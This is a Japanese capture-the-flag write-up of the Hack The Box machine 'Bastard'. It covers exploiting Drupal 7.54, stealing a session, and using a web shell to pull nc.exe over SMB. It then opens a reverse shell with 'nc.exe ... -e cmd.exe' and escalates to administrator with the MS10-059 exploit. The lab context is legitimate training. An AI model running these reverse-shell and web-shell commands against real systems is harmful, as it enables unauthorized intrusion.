Hack The Box Writeup | Bastard

Bastardはwindowsのマシンで、難易度はmediumです。

・使用ツール
Windows-Exploit-Suggester
smbserver.py

流れとしては、以下のようになっています。
1.nmapでDrupalのバージョン確認
2.searchsploitでexploitを検索
3.exploitを修正(webshellできるようにする)
4.exploitを利用して、session idを奪取し、webの認証を突破
5.smbserverを立てて、対象マシンにnc.exeを送る
6.nc.exeでshellを取得
7.Windows-Exploit-Suggesterを使って、Privilege Escalationの脆弱性を特定
8.googleでPrivilege Escalationのexploitを探す
9.smbserverを立てて、対象マシンにexploitを送る
10.exploitを実行して管理者権限を取得

1.Enumeration

nmpaでオープンポートが、80,135,49154であることを確認

nmapのデフォルトスクリプトエンジンを実行(-sC オプション)

/CHANGELOG.txtにアクセスすると、「Drupal 7.54」を利用していることが分かります。

2.Exploitation

searchsploitで、exploitが存在するか確認します。
Remote Code Executionの「41564.php」を使用します。

searchsploit -m 41564

「41564.php」の以下の部分を変更します。

exploitを実行しますが、エラーが発生します。

php-curlがインストールされていないようなので、インストールします。

sudo apt-get install -y php-curl

再度exploitを実行すると成功し、sessionのname,id,tokenが確認できます。

Cookie Editerにsession_name,session_idを入力すると、ログインすることができます。

whoamiが実行できました。

nc.exeを対象マシンにsmbで送ります。

cp /usr/share/windows-binaries/nc.exe /home/kali/hackTheBox/Bastard/  ←nc.exeをコピー
sudo python3 smbserver.py kali /home/kali/hackTheBox/Bastard/           ←smbサーバを起動
画像に alt 属性が指定されていません。ファイル名: Kali-Linux-2020.3-vmware-amd64-2020-10-09-22-45-35-1024x220.png

ブラウザで下記にアクセスします。

http://10.10.10.9/dixuSOspsOUU.php?cmd=copy%20\\10.10.14.14\kali\nc.exe%20nc.exe

下記のコマンドで接続します

10.10.10.9/dixuSOspsOUU.php?cmd=nc.exe 10.10.14.14 1234 -e cmd.exe

シェルが取得できました。

3.Privilege Escalation

管理者権限はないので、特権エスカレーションが必要です。
systeminfoでOS情報、パッチ情報を確認します。

脆弱性を確認するために、Windows-Exploit-Suggesterを利用します。

sudo git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git

Suggesterをアップデート

python /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --update

Suggesterを実行します。

sudo python /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py -d 2020-10-09-mssb.xls --systeminfo systeminfo.txt

「MS10-059」の脆弱性を試してみます。
「MS10-059」のexploitをダウンロードします。

sudo git clone https://github.com/egre55/windows-kernel-exploits.git

exploitをコピーします。

cp /opt/windows-kernel-exploits/MS10-059\:\ Chimichurri/Compiled/Chimichurri.exe .

smbサーバを起動し、ncで接続を待ち受けます。

smbを使用して、exploitを実行します。

\\10.10.14.14\kali\Chimichurri.exe 10.10.14.14 1235

管理者権限が取得できました。